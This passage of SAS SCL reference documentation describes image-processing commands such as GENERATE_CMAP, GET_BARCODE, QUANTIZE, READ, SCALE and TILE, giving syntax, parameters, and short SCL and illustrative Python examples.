GENERATE_CMAP
Generates a color map for the selected image
Syntax
rc=IMGOP(task-id,'GENERATE_CMAP', COLORRAMP,reds,greens, blues);
rc=IMGOP(task-id,'GENERATE_CMAP', GRAYRAMP,n);
reds
is the number of red colors to generate.
Type: Numeric
greens
is the number of green colors to generate.
Type: Numeric
blues
is the number of blue colors to generate.
Type: Numeric
n
is the number of gray colors to generate.
Type: Numeric
Details
GENERATE_CMAP generates two kinds of color maps:
COLORRAMP
is a color ramp of RGB colors that fill the RGB color spectrum, given the desired number of red, green, and blue shades to use. This command generates a color map of \( \text{reds} \times \text{greens} \times \text{blues} \) colors, with a maximum of 256 colors allowed. It is possible to generate a color map that consists only of reds, greens, or blues by specifying that only one shade be used for the other two colors.
GRAYRAMP
is a color map that consists only of grays. The number of shades of gray is limited to 256.
After the color map is generated, it can be applied to an image with either the DITHER command or the MAP_COLORS command.
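A COLORRAMP-style map can be sketched in Python. This is an illustrative reconstruction (the exact shade spacing and ordering SAS uses are not specified here); it builds reds x greens x blues entries, capped at 256:

```python
def color_ramp(reds, greens, blues):
    """Build a COLORRAMP-style map of reds*greens*blues RGB triples.

    Each channel is sampled evenly across 0..255 with the requested
    number of shades. Assumed behavior: a single shade for a channel
    yields full intensity (255) for that channel.
    """
    if reds * greens * blues > 256:
        raise ValueError("a color map is limited to 256 entries")

    def shades(n):
        # n evenly spaced channel values from 0 to 255
        return [255] if n == 1 else [round(i * 255 / (n - 1)) for i in range(n)]

    return [(r, g, b) for r in shades(reds)
                      for g in shades(greens)
                      for b in shades(blues)]
```

With 5, 5, and 4 shades, as in the example below, the ramp contains 100 entries.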
Example
Use the GENERATE_CMAP command to generate a color ramp and a gray ramp, each containing 100 color map entries:
gray:
rc=imgop(task-id,'GENERATE_CMAP','GRAYRAMP',100);
return;
color:
rc=imgop(task-id,'GENERATE_CMAP','COLORRAMP',5,5,4);
return;
GET_BARCODE
Returns the value of the specified bar code
Syntax
rc=IMGOP(task-id,'GET_BARCODE',
bar-code-type, return-string,<x1,y1,x2,y2>);
bar-code-type
is a character string that contains one value from the following list:
'CODE39' code 39 bar codes
'CODE39X' extended code 39 bar codes
'CODE128' code 128 bar codes.
Type: Character
return-string
contains the returned value. Remember to make this variable long enough to hold
the longest value that could be returned.
Type: Character
x1,y1
are the upper coordinates of the area in the image to search for the bar code. The
default is 0,0.
x2,y2
are the lower coordinates of the area in the image to search for the bar code. The
default is the width and height of the image. Note that the area specified for the
bar-code location can be larger than the bar code. This area should be relatively free
of things like other text.
Details
Given an image with a bar code, the GET_BARCODE command attempts to decode the
bar code and then returns the value of the bar code. The bar code can be decoded only if
it is clear in the image. The DPI resolution used in scanning the image will determine
how clearly the bar code appears in the image. Below 200 DPI, recognition is very poor.
Example
Return the value of the bar code that is located in the 10,10,300,200 area of the image:
rc=imgop(taskid,'GET_BARCODE','CODE39',retstring,
10,10,300,200);
GET_COLOR
Returns the RGB values of the index positions of a color map for the selected image
Syntax
rc=IMGOP(task-id,'GET_COLOR',index,red,green,blue);
index
contains the identifier for the color map index.
Type: Numeric
red
is the red value for the index.
Type: Numeric
green
is the green value for the index.
Type: Numeric
blue
is the blue value for the index.
Type: Numeric
Details
If index is outside the valid range for the color map, an error is returned. The color values are in the range of 0 to 255.
Example
See the example for “CREATE_IMAGE” on page 743.
GET_PIXEL
Returns the pixel value of a specified position in the selected image
Syntax
rc=IMGOP(task-id,'GET_PIXEL',x,y,red,<green, blue>);
x
is the row location in the image.
Type: Numeric
y
is the column location in the image.
Type: Numeric
red
is either the red value of an RGB image or the pixel value for a CMAP or GRAY image.
Type: Numeric
green
is the green value for an RGB image and is ignored for all others.
Type: Numeric
blue
is the blue value for an RGB image and is ignored for all others.
Type: Numeric
Details
An error is returned if any of the values are out of bounds. The colors for a CMAP and RGB image must be between 0 and 255. For a GRAY image, GET_PIXEL returns a red value of either 0 or 1.
Example
See the example for “CREATE_IMAGE” on page 743
GRAB_CMAP
Grabs the color map from the selected image
Syntax
rc=IMGOP(task-id,'GRAB_CMAP');
Details
After the color map is grabbed, it can be applied to another image with either the DITHER command or the MAP_COLORS command.
Example
Grab the color map of one image and then apply it to another image with the DITHER command:
```plaintext
rc=imgop(task-id,'READ','image-1');
rc=imgop(task-id,'GRAB_CMAP');
rc=imgop(task-id,'READ','image-2');
rc=imgop(task-id,'DITHER');
```
MAP_COLORS
Maps colors to the closest color in the selected color map
Syntax
```plaintext
rc=IMGOP(task-id,'MAP_COLORS',option);
region-id=PICFILL(graphenv-id,type,ulr,ulc,lrr,lrc,source,'MAP_COLORS',<arguments>);
```
**option**
specifies the order in which the colors are to be mapped. By default, the colors are mapped in an order that is defined by an internal algorithm. Specify 'SAME_ORDER' to force the color map of the image to be in the same order as the selected color map.
Type: Character
Details
MAP_COLORS acts on the currently selected image. Like the DITHER and QUANTIZE commands, MAP_COLORS reduces the number of colors in a color image. Unlike DITHER, MAP_COLORS attempts to choose colors by looking at pixels individually, not in groups. This technique is much less computationally expensive than DITHER, although it does not handle continuous-tone images as well.
Continuous-tone images contain many shades of colors. Because MAP_COLORS maps the colors in an image to their closest colors in the color map, many of the shades of a color remap to the same color in the color map. This can reduce the detail in the image. For example, a continuous-tone, black-and-white image would contain several shades of gray in addition to black and white. When MAP_COLORS remaps the colors in the image, the shades of gray are mapped to either black or white, and much of the detail in the image is lost.
Unlike the QUANTIZE command, MAP_COLORS is passed a particular color map to use. Therefore, multiple images can be reduced to the same color map, further reducing the number of colors used in a frame that contains multiple images. The algorithm looks at each pixel in the image and determines the closest color in the color map. This type of algorithm works best for images that are not continuous-tone images, such as charts, cartoon images, and so on.
Specify the option ‘SAME_ORDER’ if you are mapping several images and you want the color map to be identical for all of them.
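The per-pixel nearest-color step can be sketched in Python. The distance metric is an assumption (the document says only "closest color"); squared Euclidean distance in RGB space is used here for illustration:

```python
def map_colors(pixels, cmap):
    """Map each RGB pixel to the nearest entry in a color map.

    pixels and cmap are sequences of (r, g, b) tuples. "Nearest" is
    squared Euclidean distance in RGB space -- an assumed metric.
    """
    def nearest(p):
        return min(cmap, key=lambda c: sum((pc - cc) ** 2
                                           for pc, cc in zip(p, c)))
    return [nearest(p) for p in pixels]
```

Note how a map containing only black and white collapses all grays onto those two entries, which is exactly the loss of detail described for continuous-tone images.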
**Example**
Grab the color map of one image and then apply it to another image with the MAP_COLORS command:
```plaintext
rc=imgop(task-id,'READ',image1);
rc=imgop(task-id,'GRAB_CMAP');
rc=imgop(task-id,'READ',image2);
rc=imgop(task-id,'MAP_COLORS');
```
**MIRROR**
Mirrors an image
---
**Syntax**
```plaintext
rc=IMGOP(task-id,'MIRROR');
```
**Details**
MIRROR acts on the currently selected image. It flips an image on its vertical axis, resulting in a “mirror” copy of the original image.
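Flipping on the vertical axis amounts to reversing each pixel row, as this illustrative Python sketch (not the SAS implementation) shows:

```python
def mirror(image):
    """Flip a 2-D pixel grid on its vertical axis by reversing each row."""
    return [list(reversed(row)) for row in image]
```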
**Example**
Mirror an image:
```plaintext
if (mirror=1) then
rc=imgop(task-id,'MIRROR');
```
**NEGATE**
Changes an image to a negative
---
**Syntax**
```plaintext
rc=IMGOP(task-id,'NEGATE');
region-id=PICFILL(graphenv-id,type,ulr,ulc,lrr,lrc,source,<'NEGATE'<,arguments>>);
```
**Details**
NEGATE acts on the currently selected image. It creates a photographic "negative" of the image by reversing the use of dark and light colors. The negative is created by replacing each color with its complement.
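For an 8-bit RGB pixel the complement is simply 255 minus each channel, as in this illustrative Python sketch:

```python
def negate(pixel):
    """Replace an (r, g, b) pixel with its complement, as NEGATE does."""
    r, g, b = pixel
    return (255 - r, 255 - g, 255 - b)
```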
**Example**
Create a negative of an image:
```plaintext
if (negative=1) then
rc=imgop(task-id,'NEGATE');
```
---
**PASTE**
Displays an image at a specified location
**Syntax**
```plaintext
rc=IMGOP(task-id,'PASTE'<,x,y>);
```
x
is the X coordinate of the top left corner of the image.
Type: Numeric
y
is the Y coordinate of the top left corner of the image.
Type: Numeric
**Details**
PASTE acts on the currently selected image. If no coordinates are specified, the selected image is displayed either at location 0,0 or at the coordinates set by a previous PASTE. To set new coordinates, you can use a PASTE command with no image specified. Coordinates that are specified by a new PASTE override previous settings.
**Example**
Display an image with its upper left corner at 200, 200:
```plaintext
if (display=1) then
rc=imgop(task-id,'PASTE',200,200);
```
**PASTE_AUTO**
Displays an image automatically
---
**Syntax**
rc=IMGOP(task-id,'PASTE_AUTO',x,y);
x
is the X coordinate of the top left corner of the image.
Type: Numeric
y
is the Y coordinate of the top left corner of the image.
Type: Numeric
**Details**
PASTE_AUTO acts on the currently selected image. It provides the same basic function as PASTE. In addition, PASTE_AUTO modifies an image by dithering it or by reducing the number of colors it uses, so that you can display it on the current device. It also attempts to prevent switching to false colors or to a private color map.
**Example**
Automatically display an image with its upper left corner at 200, 200:
```plaintext
if (display=1) then
rc=imgop(task-id,'PASTE_AUTO',200,200);
```
---
**QUANTIZE**
Reduces the number of colors used for an image
---
**Syntax**
rc=IMGOP(task-id,'QUANTIZE',colors);
region-id=PICFILL(graphenv-id,type,ulr,ulc,lrr,lrc,source,<'QUANTIZE'<,arguments>>);
**colors**
is the number of colors to use for the image. The `colors` variable must have a value from 2 through 256.
Type: Numeric
Details
QUANTIZE acts on the currently selected image. It generates a color-mapped image for which the command assigns the values in the color map. QUANTIZE results in a very good approximation of the image, with the possible negative effect that two or more images quantized to the same number of colors may still use different colors for each image. (The algorithm is an adaptation of the Xiaolin Wu algorithm, as described in Graphics Gems II.)
Example
Reduce the number of colors for an image to the number stored in NUMCOLOR:
```c
if (quantize eq 1) then
rc=imgop(task-id,'QUANTIZE',numcolor);
```
---
**QUERYC, QUERYL, and QUERYN**
Query information about images
**Syntax**
```c
rc=IMGOP(task-id,'QUERYC',attribute,information);
rc=IMGOP(task-id,'QUERYL',attribute,list-id);
rc=IMGOP(task-id,'QUERYN',attribute,information);
```
**attribute**
is the value to report. Attributes for QUERYC are listed in “Attributes for the QUERYC Command” on page 761. Attributes for QUERYL are listed in “Attributes for the QUERYL Command” on page 761. Attributes for QUERYN are listed in “Attributes for the QUERYN Command” on page 762.
Type: Character
**information**
contains the information that is returned by QUERYC and QUERYN. This variable is character when used by QUERYC and numeric when returned by QUERYN.
Type: Character or Numeric
**list-id**
contains the identifier for the SCL list of information items that are returned by QUERYL. See attribute for details.
---
Attributes for the QUERYC Command
The values for attribute for QUERYC are:
- **DESCRIPT**
returns information about the image size and color map. The information can be up to 45 characters long.
- **FILENAME**
returns the image path string.
- **FORMAT**
returns the original file format, such as GIF.
- **TYPE**
returns the IMAGE type, which can be 'CMAP', 'GRAY', or 'RGBA'.
Attributes for the QUERYL Command
The values for attribute for QUERYL are:
- **ACTIVE_LIST**
returns an SCL list containing the identifiers for all active images (images that are being used but that are not necessarily visible).
- **VISIBLE_LIST**
returns an SCL list containing the identifiers for all currently displayed images.
- **SELECT_INFO**
returns a named SCL list containing the numeric values for the currently selected image:
- **IS_ACTIVE**
has a value of 1 if the image is being used and has data associated with it. If IS_ACTIVE=1, the following items are also returned:
- **WIDTH** the image width in pixels
- **HEIGHT** the image height in pixels
- **DEPTH** the image depth
- **TYPE** the image type: 'CMAP', 'GRAY', 'RGBA'
- **IS_VISIBLE**
has a value of 1 if the image is being displayed.
- **XPOSN**
is the x position.
- **YPOSN**
is the y position.
- **NCOLORS**
is the number of colors, if TYPE='CMAP' (color mapped)
RDEPTH
is the red depth, if TYPE='RGBA'
GDEPTH
is the green depth, if TYPE='RGBA'
BDEPTH
is the blue depth, if TYPE='RGBA'
ADEPTH
is the alpha depth (degree of transparency), if TYPE='RGBA'
GLOBAL_INFO
returns a named list that contains the following items:
NUM_ACTIVE
is the number of active images used but not necessarily visible.
SELECT
is the identifier of the currently selected image.
WSIZE_WIDTH
is the window width in pixels.
WSIZE_HEIGHT
is the window height in pixels.
Attributes for the QUERYN Command
The values for attribute for QUERYN are:
ADEPTH
returns the alpha depth.
BDEPTH
returns the blue depth.
COLORMAP_LEN
returns the size of the color map.
DEPTH
returns the image depth.
GDEPTH
returns the green depth.
HEIGHT
returns the image height in pixels.
IS_BLANK
returns a value that indicates whether the current page is blank:
1 blank
0 not blank (valid for monochrome images only).
NCOLORS
returns the number of colors.
RDEPTH
returns the red depth.
SELECT
returns the identifier of the currently selected image.
TYPE
returns the image type:
1 gray-scale
2 color mapped
3 RGBA.
WIDTH
returns the image width in pixels.
Details
The QUERYC, QUERYL, and QUERYN commands return information about all images as well as about the Image window. QUERYC returns the values of character attributes. QUERYL returns the values of attributes stored in an SCL list. QUERYN returns the values of numeric attributes. These commands act on the image that is currently selected.
Examples
Example 1: Using QUERYC Display an image's description, filename, format, and type:
rc=imgop(task-id,'READ',
'/usr/local/images/color/misc/canoe.gif');
rc=imgop(task-id,'QUERYC','DESCRIPT',idescr);
put idescr=;
rc=imgop(task-id,'QUERYC','FILENAME',ifile);
put ifile=;
rc=imgop(task-id,'QUERYC','FORMAT',iformat);
put iformat=;
rc=imgop(task-id,'QUERYC','TYPE',itype);
put itype=;
This program writes the following lines to the LOG window:
IDESCR=640x480 8-bit CMAP, 256 colormap entries
IFILE=/usr/local/images/color/misc/canoe.gif
IFORMAT=GIF
ITYPE=CMAP
Example 2: Using QUERYL
Display the number of active images:
qlist=0;
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ',path1);
rc=imgop(task-id,'SELECT',2);
rc=imgop(task-id,'READ',path2);
rc=imgop(task-id,'PASTE');
rc=imgop(task-id,'QUERYL','ACTIVE_LIST',qlist);
images=listlen(qlist);
put images=;
This program writes the following line to the LOG window:
images=2
Display an SCL list of information about the current image:
qlist=makelist();
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYL','SELECT_INFO',qlist);
call putlist(qlist);
This program writes the following information to the LOG window:
(IS_ACTIVE=1 IS_VISIBLE=0 XPOSN=0 YPOSN=0 WIDTH=1024
HEIGHT=768 DEPTH=8 TYPE='CMAP' NCOLORS=253 )
Display an SCL list of information about the Image window:
qlist=makelist();
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYL','GLOBAL_INFO',qlist);
call putlist(qlist);
When the program is run, the following lines are written to the LOG window:
(NUM_ACTIVE=1 SELECT=1 WSIZE_WIDTH=682
WSIZE_HEIGHT=475 )
Example 3: Using QUERYN
Display information about the Image window. (Assume that all variables have been initialized prior to being used.)
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYN','SELECT',select);
rc=imgop(task-id,'QUERYN','HEIGHT',height);
rc=imgop(task-id,'QUERYN','WIDTH',width);
rc=imgop(task-id,'QUERYN','DEPTH',depth);
rc=imgop(task-id,'QUERYN','RDEPTH',rdepth);
rc=imgop(task-id,'QUERYN','GDEPTH',gdepth);
rc=imgop(task-id,'QUERYN','BDEPTH',bdepth);
rc=imgop(task-id,'QUERYN','ADEPTH',adepth);
rc=imgop(task-id,'QUERYN','NCOLORS',ncolors);
rc=imgop(task-id,'QUERYN','TYPE',type);
put select= height= width= depth= rdepth= gdepth=;
put bdepth= adepth= ncolors= type= ;
This program returns the following values:
SELECT=1 HEIGHT=470 WIDTH=625 DEPTH=8 RDEPTH=0
GDEPTH=0 BDEPTH=0 ADEPTH=0 NCOLORS=229 TYPE=2
READ
Reads an image from an external file, a SAS catalog, or a device
Syntax
rc=IMGOP(task-id, 'READ', pathname <,attributes >);
rc=IMGOP(task-id, 'READ', device-name, 'DEVICE=CAMERA | SCANNER <attributes>');
pathname
is the pathname of the external file that contains the image or the path string that is returned by the LNAMEMK function.
Type: Character
device-name
specifies the name of a camera or scanner:
'KODAKDC40'
Kodak DC 40 camera (available only under the Windows 95 operating system)
'HPSCAN'
HP Scanjet scanners (available only under Windows and HP/UX operating systems)
If you specify a device name, then you must use the DEVICE = attribute to indicate the type of device.
Type: Character
attributes
are file- or device-specific attributes. See "Attributes for Reading and Writing Files" on page 782 for possible choices.
Type: Character
Details
READ acts on the currently selected image. You can specify the file directly (using its physical filename path) or by using the information returned by a previous LNAMEMK function call. The LNAMEMK function creates a single character variable that contains location information about the image (even if it resides in a SAS catalog), as well as other image attributes.
The FORMAT = attribute must be specified for Targa images, for images that reside in SAS catalogs, and for host-specific formats. FORMAT is not required in other cases, but it is always more efficient to specify it.
Examples
- Read an image that is stored in a SAS catalog:
path=lnamemk(5,'sashelp.imagapp.gfkids',
'format=cat');
rc=imgop(task-id,'READ',path);
- Specify a file in the READ command:
rc=imgop(task-id,'READ',
'/usr/images/color/sign.gif');
- Read from a scanner:
rc=imgop(task-id,'READ', 'hpscan',
'device=scanner dpi=100');
- Take a picture with a camera:
rc=imgop(task-id,'READ',
'kodakdc40',
'device=camera takepic');
- Read a Portable Network Graphics image:
rc=imgop(taskid,'READ','/images/test.png',
'format=PNG ');
- Read an image using READ and wait 5 seconds before displaying the image after each PASTE command:
rc=imgop(taskid,'READ',path);
rc=imgop(taskid,'PASTE');
rc=imgctrl(taskid,'WAIT',5);
rc=imgop(taskid,'READ',path2);
rc=imgop(taskid,'PASTE');
rc=imgctrl(taskid,'WAIT',5);
---
**READ_CLIPBOARD**
Reads an image from the host clipboard
---
**Syntax**
rc=IMGOP(task-id,'READ_CLIPBOARD');
**Details**
READ_CLIPBOARD acts on the currently selected image. On some hosts, the clipboard can be read only after you use the WRITE_CLIPBOARD command.
**Example**
Read an image from the clipboard and display it:
rc=imgop(task-id,'READ_CLIPBOARD');
rc=imgop(task-id,'PASTE');
READ_PASTE
Reads and displays an image
Syntax
rc=IMGOP(task-id,'READ_PASTE',x,y,image-path<,attributes>);
x
is the X coordinate of the top left corner of the image.
Type: Numeric
y
is the Y coordinate of the top left corner of the image.
Type: Numeric
image-path
contains the pathname of the external file that contains the image or the path string that is returned by the LNAMEMK function.
Type: Character
attributes
are file-specific attributes. See “Attributes for Reading and Writing Files” on page 782 for possible choices.
Type: Character
Details
READ_PASTE acts on the currently selected image. It provides the same functionality as READ and PASTE. Notice that x and y are required.
Example
Read and paste an image that is stored in a SAS catalog:
path=lnamemk(5,'sashelp.imagapp.gfkids',
'format=cat');
rc=imgop(task-id,'READ_PASTE',1,1,path);
READ_PASTE_AUTO
Reads and automatically displays an image
Syntax
rc=IMGOP(task-id,'READ_PASTE_AUTO',x,y,image-path<,attributes>);
x
is the X coordinate of the top left corner of the image.
Type: Numeric
y
is the Y coordinate of the top left corner of the image.
Type: Numeric
image-path
contains the pathname of the external file that contains the image or the path string that is returned by the LNAMEMK function.
Type: Character
attributes
are file-specific attributes. See “Attributes for Reading and Writing Files” on page 782 for possible choices.
Type: Character
Details
READ_PASTE_AUTO acts on the currently selected image. It provides the same functionality as READ and PASTE_AUTO. Notice that x and y are required.
Example
Read and automatically paste an image that is stored in a SAS catalog:
path=lnamemk(5,'sashelp.imagapp.gfkids','format=cat');
rc=imgop(task-id,'READ_PASTE_AUTO',1,1,path);
**ROTATE**
Rotates an image clockwise by 90, 180, or 270 degrees
Syntax
rc=IMGOP(task-id,'ROTATE',degrees);
region-id=PICFILL(graphenv-id,type,ulr,ulc,lrr,lrc,source,<'ROTATE'<,arguments>>);
**degrees**
is the number of degrees to rotate the image: 90, 180, or 270.
Type: Numeric
**Details**
**ROTATE** acts on the currently selected image.
**Example**
Rotate an image the number of degrees stored in RV:
```plaintext
main:
rc=imgop(task-id,'READ',path);
if (rv ge 90) then
do;
rc=imgop(task-id,'ROTATE',rv);
rc=imgop(task-id,'PASTE');
end;
return;
```
---
**SCALE**
Scales an image
**Syntax**
```plaintext
rc=IMGOP(task-id,'SCALE',width,height<,algorithm>);
region-id=PICFILL(graphenv-id,type,ulr,ulc,lrr,lrc,source,<'SCALE'<,arguments>>);
```
**width**
is the new width of the image (in pixels).
Type: Numeric
**height**
is the new height of the image (in pixels).
Type: Numeric
**algorithm**
specifies which scaling algorithm to use:
**BILINEAR**
computes each new pixel in the final image by averaging four pixels in the source image and using that value. The **BILINEAR** algorithm is more computationally expensive than **LINEAR**, but it preserves details in the image better.
LINEAR replicates pixels when the image is scaled up and discards pixels when the image is scaled down. The LINEAR algorithm yields good results on most images. However, it does not work very well when you are scaling down an image that contains small, but important, features such as lines that are only one pixel wide. LINEAR is the default.
Type: Character
Details
SCALE acts on the currently selected image. It scales the image to a new image. The size of the new image is specified in pixels; however, if one of the two values is -1, then the value used for that scale factor is computed to conserve the original image's aspect ratio.
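The -1 aspect-ratio behavior can be sketched in Python (illustrative only; the rounding SAS applies is an assumption):

```python
def resolve_scale(orig_w, orig_h, new_w, new_h):
    """Resolve SCALE's width/height arguments in pixels.

    If either requested dimension is -1, it is computed so that the
    original image's aspect ratio is preserved, as described above.
    """
    if new_w == -1 and new_h == -1:
        raise ValueError("at most one dimension may be -1")
    if new_w == -1:
        new_w = round(orig_w * new_h / orig_h)
    elif new_h == -1:
        new_h = round(orig_h * new_w / orig_w)
    return new_w, new_h
```

Passing twice the original width with a height of -1, as in the example below, doubles both dimensions.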
Example
Double the size of an image:
main:
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYN','WIDTH',width);
rc=imgop(task-id,'SCALE',2*width,-1);
rc=imgop(task-id,'PASTE');
return;
SELECT
Selects the image identifier to be used in other commands
Syntax
rc=IMGOP(task-id,'SELECT'<,image-id>);
image-id contains the identifier of the image to select. The default is 1. The image-id variable must be a number between 1 and 999, inclusive. Using lower sequential numbers (under 32) is more efficient.
Type: Numeric
Details
The main purpose of the SELECT command is to enable you to work with more than one image. The command specifies the image identifier to be used in all subsequent commands until another SELECT command is issued.
Only the COPY, DESTROY, and UNPASTE commands can act on either the currently selected image or on a specified image identifier.
Example
Display two images at once:
```c
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ_PASTE',1,1,path1);
rc=imgop(task-id,'SELECT',2);
rc=imgop(task-id,'READ_PASTE',200,200,path2);
```
---
**SET_COLORS**
Assigns the RGB values for the index positions of a color map for the current image
**Syntax**
```c
rc=IMGOP(task-id,'SET_COLORS',index,red,green,blue);
```
- **index**
- contains the identifier for the color map index.
- Type: Numeric
- **red**
- is the red value for the index.
- Type: Numeric
- **green**
- is the green value for the index.
- Type: Numeric
- **blue**
- is the blue value for the index.
- Type: Numeric
**Details**
SET_COLORS acts on the currently selected image. It can be used with either a new image or an existing image. If index is outside the valid range for the color map an error is returned. The color values must be between 0 and 255.
**Example**
See the example for “CREATE_IMAGE” on page 743.
---
**SET_PIXEL**
Assigns the pixel value in an image at the specified position
Syntax
rc=IMGOP(task-id,'SET_PIXEL',x,y,red,<green, blue>);
x
is the row location in the image.
Type: Numeric
y
is the column location in the image.
Type: Numeric
red
is either the red value of an RGB image or the pixel value for a CMAP or GRAY image.
Type: Numeric
green
is the green value for an RGB image and is ignored for all others.
Type: Numeric
blue
is the blue value for an RGB image and is ignored for all others.
Type: Numeric
Details
SET_PIXEL acts on the currently selected image. It can be used with either a new image or an existing image. An error is returned if any of the values are out of bounds. The colors for a CMAP and an RGB image must be between 0 and 255. For a GRAY image, SET_PIXEL returns either 0 or 1 for red.
CAUTION:
Image data can be destroyed. Use this function carefully, or you can destroy your image data. SET_PIXEL overwrites the image data in memory and thus destroys the original image.
Example
See the example for “CREATE_IMAGE” on page 743.
STANDARD_CMAP
Selects a color map
Syntax
```plaintext
rc=IMGOP(task-id,'STANDARD_CMAP',color-map);
```
color-map
is the color map to designate as the current color map.
**BEST**
is a special, dynamic color map that can contain up to 129 colors. The color map contains the 16 personal computer colors, a set of grays, and an even distribution of colors. The colors are dynamically selected based on the capabilities of the display and on the number of available colors. The best set of colors is chosen accordingly.
**COLORMIX_CGA**
is the 16-color personal computer color map.
**COLORMIX_192**
is a 192-color blend.
**DEFAULT**
is an initial set of colors that is chosen by default. The available colors may vary between releases.
**SYSTEM**
is the color map for the currently installed device or system. The color map obtained is a “snapshot” of the color map for the current device and does not change as the device’s color map changes.
*Type: Character*
Details
**STANDARD_CMAP** specifies that the current color map should be filled with one of the “standard” image color maps. This new color map can be applied to any image by using either the DITHER command or the MAP_COLORS command.
**Example**
Select a new color map and use the DITHER command to apply it to an image:
```plaintext
rc=imgop(task-id,'STANDARD_CMAP','COLORMIX_CGA');
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'DITHER');
```
**THRESHOLD**
Converts color images to black and white using a *threshold* value
Syntax
rc=IMGOP(task-id,'THRESHOLD',value);
value
is a threshold value for converting standard RGB values to monochrome. Value can be:
1...255 sets the threshold that determines whether a color maps to black or white
0 defaults to 128
-1 calculates the threshold value by averaging all pixels in the image.
Type: Numeric
Details
The THRESHOLD command acts on the specified or currently selected image. It enables documents that are scanned in color to be converted to monochrome for applying optical character recognition (OCR) and for other purposes. Dithering is not a good technique for converting images when OCR is used.
The threshold is a color value that acts as a cut-off point for converting colors to black and white. All colors greater than the value map to white and all colors less than or equal to the value map to black.
The algorithm weights the RGB values using standard intensity calculations for converting color to gray scale.
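The per-pixel decision can be sketched in Python. The luminance weights below (0.299 R + 0.587 G + 0.114 B, the common ITU-R 601 coefficients) are an assumption consistent with the "standard intensity calculations" mentioned above, not a statement of the exact SAS weights:

```python
def threshold_pixel(r, g, b, value=128):
    """Convert one RGB pixel to black (0) or white (1) by threshold.

    Gray levels greater than the threshold map to white; levels less
    than or equal to it map to black, per the THRESHOLD details.
    """
    gray = 0.299 * r + 0.587 * g + 0.114 * b
    return 1 if gray > value else 0
```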
TILE
Replicates the current image into a new image
Syntax
rc=IMGOP(task-id,'TILE',new-width,new-height);
new-width
is the width (in pixels) for the tiled images to fill.
Type: Numeric
new-height
is the height (in pixels) for the tiled images to fill.
Type: Numeric
Details
TILE acts on the currently selected image. The size, in pixels, of the area for the new tiled image is specified by the two parameters new-width and new-height. The area defined by new-width x new-height is filled beginning in the upper left corner. The current image is placed there. Copies of the current image are added to the right until the row is filled. This process then starts over on the next row until the area defined by new-width x new-height is filled. For example, if the current image is 40 x 40 and new-width x new-height is 200 x 140, then the current image is replicated 5 times in width and 3.5 times in height. This technique is useful for creating tiled backdrops.
Note: Before tiling an image, you must turn off the SCALE option for the image.
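The fill order described above (left to right, then row by row, cropping partial copies at the edges) can be sketched in Python for illustration:

```python
def tile(image, new_w, new_h):
    """Replicate a 2-D pixel grid to fill a new_w x new_h area.

    Filling starts at the upper left; copies repeat to the right until
    the row is filled, then row by row down, with partial copies
    cropped at the right and bottom edges.
    """
    img_h = len(image)
    img_w = len(image[0])
    return [[image[y % img_h][x % img_w] for x in range(new_w)]
            for y in range(new_h)]
```

A 2 x 2 grid tiled into a 5 x 3 area yields 2.5 copies across and 1.5 copies down, matching the fractional-replication arithmetic in the 40 x 40 example above.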
Example
Create a 480 x 480 tiled image from a 48 x 48 image:
rc=imgop(task-id,'READ','sashelp.c0c0c.access',
'format=cat');
rc=imgop(task-id,'TILE',480,480);
UNPASTE
Removes an image from the display
Syntax
rc=IMGOP(task-id,'UNPASTE'<,image-id>);
image-id
contains the identifier of the image to remove from the display.
Type: Numeric
Details
UNPASTE acts on the specified or currently selected image. It removes from the display the currently selected image or the image whose identifier is specified. The image is not removed from memory. UNPASTE enables you to remove an image from the display and to later repaste it without re-reading it.
Example
Display two images at once and then remove one of them:
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ_PASTE',1,1,name1);
rc=imgop(task-id,'SELECT',2);
rc=imgop(task-id,'READ_PASTE',200,200,name2);
...more SCL statements...
if (omit=1) then
rc=imgop(task-id,'UNPASTE',1);
WRITE
Writes an image to an external file or a SAS catalog
Syntax
rc=IMGOP(task-id,'WRITE',image-path<,attributes>);
image-path
is the pathname of the external file to contain the image or the path string that is returned by the LNAMEMK function.
Type: Character
attributes
lists attributes that are specific to the file type. See “Attributes for Reading and Writing Files” on page 782.
Type: Character
Details
WRITE writes the currently selected image to an external file. The file can be specified either directly (using its physical filename path) or by using the information that was returned by a previous LNAMEMK function call. The LNAMEMK function creates a character variable that contains location information about the location of the image (even if it is to reside in a SAS catalog), as well as information about other image attributes.
The FORMAT= attribute must be specified if image-path does not include that information.
Examples
- Write an image to a SAS catalog:
```
path=lnamemk(5,'mine.images.sign','FORMAT=CAT');
rc=imgop(task-id,'WRITE',path);
```
- Specify a file in the WRITE command. (Notice that file attributes are included.)
```
rc=imgop(task-id,'WRITE','/user/images/sign.tif',
'FORMAT=TIFF COMPRESS=G3FAX');
```
WRITE_CLIPBOARD
Writes an image to the host clipboard
Syntax
```
rc=IMGOP(task-id,'WRITE_CLIPBOARD');
```
Details
WRITE_CLIPBOARD acts on the currently selected image. The image must be pasted before it can be written to the system clipboard.
Example
Read in an image and write it to the clipboard:
```
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'WRITE_CLIPBOARD');
```
WSIZE
Sets the size of the Image window
Syntax
rc=IMGCTRL(task-id,'WSIZE',width,height<,xposition,yposition>);
**width**
is the width of the window (in pixels).
Type: Numeric
**height**
is the height of the window (in pixels).
Type: Numeric
**xposition**
is the X coordinate of the top left corner.
Type: Numeric
**yposition**
is the Y coordinate of the top left corner.
Type: Numeric
Details
WSIZE sets the size of the Image window. Optionally, it positions the window at xposition and yposition. Some window managers may not support positioning.
Example
Make the Image window match the size of the image that is being displayed:
```
main:
height=0;
width=0;
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYN','WIDTH',iwidth);
rc=imgop(task-id,'QUERYN','HEIGHT',iheight);
rc=imgctrl(task-id,'WSIZE',iwidth,iheight);
rc=imgop(task-id,'PASTE',1,1);
return;
```
WTITLE
Specifies a title for the Image window
Syntax
```
rc=IMGCTRL(task-id,'WTITLE','title');
```
**title**
is the text to display as the window title.
Type: Character
Details
The specified title appears in parentheses after SAS: IMAGE in the title bar of the window.
Example
```
path=lnamemk(5,catname,'format=cat');
